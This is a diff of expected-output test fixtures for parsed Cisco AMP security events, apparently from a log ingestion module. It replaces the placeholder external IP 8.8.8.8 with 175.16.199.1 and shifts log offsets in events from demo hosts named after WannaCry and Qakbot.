@@ -247,7 +247,7 @@
 "@timestamp": "2021-01-14T17:39:49.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -288,7 +288,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 5147,
+ "log.offset": 5167,
 "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f",
 "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf",
 "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71",
@@ -304,7 +304,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "user@testdomain.com"
@@ -320,7 +320,7 @@
 "@timestamp": "2021-01-14T17:39:49.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -361,7 +361,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 6745,
+ "log.offset": 6770,
 "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f",
 "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf",
 "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71",
@@ -377,7 +377,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "user@testdomain.com"
@@ -393,7 +393,7 @@
 "@timestamp": "2021-01-14T17:39:49.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -425,7 +425,7 @@
 "host.hostname": "Demo_WannaCry_Ransomware",
 "host.name": "Demo_WannaCry_Ransomware",
 "input.type": "log",
- "log.offset": 8343,
+ "log.offset": 8373,
 "related.hash": [
 "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
 ],
@@ -434,7 +434,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -446,7 +446,7 @@
 "@timestamp": "2021-01-14T16:59:38.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -480,7 +480,7 @@
 "host.hostname": "Demo_Qakbot_1",
 "host.name": "Demo_Qakbot_1",
 "input.type": "log",
- "log.offset": 9463,
+ "log.offset": 9498,
 "related.hash": [
 "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"
 ],
@@ -489,7 +489,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -501,7 +501,7 @@
 "@timestamp": "2021-01-14T16:59:38.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -541,7 +541,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 10645,
+ "log.offset": 10685,
 "related.hash": [
 "6894b3834bd541fa85df79e44568acac",
 "8cf0ca99a8f5019d8583133b9a9379299c45470c",
@@ -552,7 +552,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "user@testdomain.com"
@@ -568,7 +568,7 @@
 "@timestamp": "2021-01-14T16:59:38.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -608,7 +608,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 12021,
+ "log.offset": 12066,
 "related.hash": [
 "6894b3834bd541fa85df79e44568acac",
 "8cf0ca99a8f5019d8583133b9a9379299c45470c",
@@ -619,7 +619,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "user@testdomain.com"
@@ -635,7 +635,7 @@
 "@timestamp": "2021-01-14T16:59:38.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -667,7 +667,7 @@
 "host.hostname": "Demo_Qakbot_1",
 "host.name": "Demo_Qakbot_1",
 "input.type": "log",
- "log.offset": 13397,
+ "log.offset": 13447,
 "related.hash": [
 "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"
 ],
@@ -676,7 +676,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -688,7 +688,7 @@
 "@timestamp": "2021-01-14T16:55:47.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -722,7 +722,7 @@
 "host.hostname": "Demo_WannaCry_Ransomware",
 "host.name": "Demo_WannaCry_Ransomware",
 "input.type": "log",
- "log.offset": 14506,
+ "log.offset": 14561,
 "related.hash": [
 "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"
 ],
@@ -731,7 +731,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -743,7 +743,7 @@
 "@timestamp": "2021-01-14T16:55:47.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -777,7 +777,7 @@
 "host.hostname": "Demo_WannaCry_Ransomware",
 "host.name": "Demo_WannaCry_Ransomware",
 "input.type": "log",
- "log.offset": 15718,
+ "log.offset": 15778,
 "related.hash": [
 "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"
 ],
@@ -786,7 +786,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -798,7 +798,7 @@
 "@timestamp": "2021-01-14T16:55:47.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -832,7 +832,7 @@
 "host.hostname": "Demo_WannaCry_Ransomware",
 "host.name": "Demo_WannaCry_Ransomware",
 "input.type": "log",
- "log.offset": 16930,
+ "log.offset": 16995,
 "related.hash": [
 "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"
 ],
@@ -841,7 +841,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -853,7 +853,7 @@
 "@timestamp": "2021-01-14T16:55:47.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -885,7 +885,7 @@
 "host.hostname": "Demo_WannaCry_Ransomware",
 "host.name": "Demo_WannaCry_Ransomware",
 "input.type": "log",
- "log.offset": 18142,
+ "log.offset": 18212,
 "related.hash": [
 "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"
 ],
@@ -894,7 +894,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -906,7 +906,7 @@
 "@timestamp": "2021-01-14T16:55:47.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -944,7 +944,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 19266,
+ "log.offset": 19341,
 "related.hash": [
 "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"
 ],
@@ -953,7 +953,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -965,7 +965,7 @@
 "@timestamp": "2021-01-14T16:55:47.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1005,7 +1005,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 20509,
+ "log.offset": 20589,
 "related.hash": [
 "45356a9dd616ed7161a3b9192e2f318d0ab5ad10",
 "7bf2b57f2a205768755c07f238fb32cc",
@@ -1016,7 +1016,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -1028,7 +1028,7 @@
 "@timestamp": "2021-01-14T16:55:47.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1066,7 +1066,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 21869,
+ "log.offset": 21954,
 "related.hash": [
 "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"
 ],
@@ -1075,7 +1075,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -1087,7 +1087,7 @@
 "@timestamp": "2021-01-14T16:55:47.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1125,7 +1125,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 23112,
+ "log.offset": 23202,
 "related.hash": [
 "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"
 ],
@@ -1134,7 +1134,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -1146,7 +1146,7 @@
 "@timestamp": "2021-01-14T16:55:46.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1180,7 +1180,7 @@
 "host.hostname": "Demo_WannaCry_Ransomware",
 "host.name": "Demo_WannaCry_Ransomware",
 "input.type": "log",
- "log.offset": 24355,
+ "log.offset": 24450,
 "related.hash": [
 "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
 ],
@@ -1189,7 +1189,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -1201,7 +1201,7 @@
 "@timestamp": "2021-01-14T16:55:46.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1233,7 +1233,7 @@
 "host.hostname": "Demo_WannaCry_Ransomware",
 "host.name": "Demo_WannaCry_Ransomware",
 "input.type": "log",
- "log.offset": 25559,
+ "log.offset": 25659,
 "related.hash": [
 "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
 ],
@@ -1242,7 +1242,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -1254,7 +1254,7 @@
 "@timestamp": "2021-01-14T16:55:46.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1294,7 +1294,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 26683,
+ "log.offset": 26788,
 "related.hash": [
 "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
 "54a116ff80df6e6031059fc3036464df",
@@ -1305,7 +1305,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -1317,7 +1317,7 @@
 "@timestamp": "2021-01-14T16:55:46.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1357,7 +1357,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 28003,
+ "log.offset": 28113,
 "related.hash": [
 "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
 "54a116ff80df6e6031059fc3036464df",
@@ -1368,7 +1368,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -1380,7 +1380,7 @@
 "@timestamp": "2021-01-14T16:35:01.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1414,7 +1414,7 @@
 "host.hostname": "Demo_Qakbot_3",
 "host.name": "Demo_Qakbot_3",
 "input.type": "log",
- "log.offset": 29323,
+ "log.offset": 29438,
 "related.hash": [
 "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
 ],
@@ -1423,7 +1423,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -1435,7 +1435,7 @@
 "@timestamp": "2021-01-14T16:35:01.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1469,7 +1469,7 @@
 "host.hostname": "Demo_Qakbot_3",
 "host.name": "Demo_Qakbot_3",
 "input.type": "log",
- "log.offset": 30524,
+ "log.offset": 30644,
 "related.hash": [
 "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
 ],
@@ -1478,7 +1478,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -1490,7 +1490,7 @@
 "@timestamp": "2021-01-14T16:35:01.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1524,7 +1524,7 @@
 "host.hostname": "Demo_Qakbot_3",
 "host.name": "Demo_Qakbot_3",
 "input.type": "log",
- "log.offset": 31725,
+ "log.offset": 31850,
 "related.hash": [
 "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
 ],
@@ -1533,7 +1533,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -1545,7 +1545,7 @@
 "@timestamp": "2021-01-14T16:35:01.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1583,7 +1583,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 32926,
+ "log.offset": 33056,
 "related.hash": [
 "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
 ],
@@ -1592,7 +1592,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -1604,7 +1604,7 @@
 "@timestamp": "2021-01-14T16:35:01.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1642,7 +1642,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 34182,
+ "log.offset": 34317,
 "related.hash": [
 "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
 ],
@@ -1651,7 +1651,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -1663,7 +1663,7 @@
 "@timestamp": "2021-01-14T16:35:01.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1703,7 +1703,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 35438,
+ "log.offset": 35578,
 "related.hash": [
 "32c9e6737dbdcbfb7563a3f27e2b1571",
 "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446",
@@ -1714,7 +1714,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -1726,7 +1726,7 @@ "@timestamp": "2021-01-14T16:35:01.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1766,7 +1766,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 36775, + "log.offset": 36920, "related.hash": [ "2f99e3456dc1d26f77c52b2119fde92f", "92673dd0e5f4a094fa6cd57bb301f884f2289f6c", @@ -1777,7 +1777,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -1895,7 +1895,7 @@ "cisco.amp.bp_data.type": "activity", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1927,13 +1927,13 @@ "host.hostname": "Demo_BP_WMIPRVSE", "host.name": "Demo_BP_WMIPRVSE", "input.type": "log", - "log.offset": 38130, + "log.offset": 38280, "related.hosts": [ "Demo_BP_WMIPRVSE" ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -1945,7 +1945,7 @@ "@timestamp": "2021-01-14T15:50:23.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
@@ -1979,7 +1979,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 68391, + "log.offset": 68546, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -1988,7 +1988,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -2000,7 +2000,7 @@ "@timestamp": "2021-01-14T15:50:23.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2034,7 +2034,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 69603, + "log.offset": 69763, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -2043,7 +2043,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -2055,7 +2055,7 @@ "@timestamp": "2021-01-14T15:50:23.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2089,7 +2089,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 70815, + "log.offset": 70980, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -2098,7 +2098,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ 
@@ -2110,7 +2110,7 @@ "@timestamp": "2021-01-14T15:50:23.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2144,7 +2144,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 72027, + "log.offset": 72197, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -2153,7 +2153,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -2165,7 +2165,7 @@ "@timestamp": "2021-01-14T15:50:23.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2203,7 +2203,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 73239, + "log.offset": 73414, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -2212,7 +2212,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -2224,7 +2224,7 @@ "@timestamp": "2021-01-14T15:50:23.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2262,7 +2262,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 74476, + "log.offset": 74656, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], 
@@ -2271,7 +2271,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -2283,7 +2283,7 @@ "@timestamp": "2021-01-14T15:50:23.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2321,7 +2321,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 75732, + "log.offset": 75917, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -2330,7 +2330,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -2342,7 +2342,7 @@ "@timestamp": "2021-01-14T15:50:23.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2380,7 +2380,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 76965, + "log.offset": 77155, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -2389,7 +2389,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -2401,7 +2401,7 @@ "@timestamp": "2021-01-14T15:50:23.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
